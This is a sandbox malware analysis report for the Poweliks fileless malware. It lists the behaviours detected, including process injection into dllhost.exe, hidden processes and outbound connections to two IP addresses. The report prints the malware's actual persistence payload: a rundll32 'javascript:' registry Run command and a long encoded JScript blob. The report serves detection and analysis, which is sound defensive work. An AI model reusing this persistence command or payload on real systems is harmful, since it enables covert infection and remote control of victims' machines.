Poweliks Fileless Malware | VTI by Score
VTI Information
VTI Score 85 / 100
VTI Database Version 2.6
VTI Rule Match Count 14
VTI Rule Type Default (PE, ...)
Detected Threats
Injection: Write into memory of another process
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" modifies memory of "c:\windows\syswow64\dllhost.exe"
Injection: Modify control flow of another process
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" alters context of "c:\windows\syswow64\dllhost.exe"
Anti Analysis: Dynamic API usage
Resolve above average number of APIs.
Network: Perform DNS request
Resolve host name "178.89.159.34".
Resolve host name "178.89.159.35".
Persistence: Install system startup script or application
Add "rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")" to windows startup via registry.
Add "#@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 
5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. 
}CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA" to windows startup via registry.
Hide Tracks: Write large data into the registry
Hide 61266 byte in "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run".
Hide 61268 byte in "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run".
Process: Create process with hidden window
The process "C:\Windows\system32\rundll32.exe" starts with hidden window.
The process "C:\Windows\syswow64\dllhost.exe" starts with hidden window.
Process: Create a page with write and execute permissions
Allocate a page in a foreign process with "PAGE_EXECUTE_READWRITE" permissions, often used to dynamically unpack code.
Network: Connect to remote host
Outgoing TCP connection to host "178.89.159.34:80".
Outgoing TCP connection to host "178.89.159.35:80".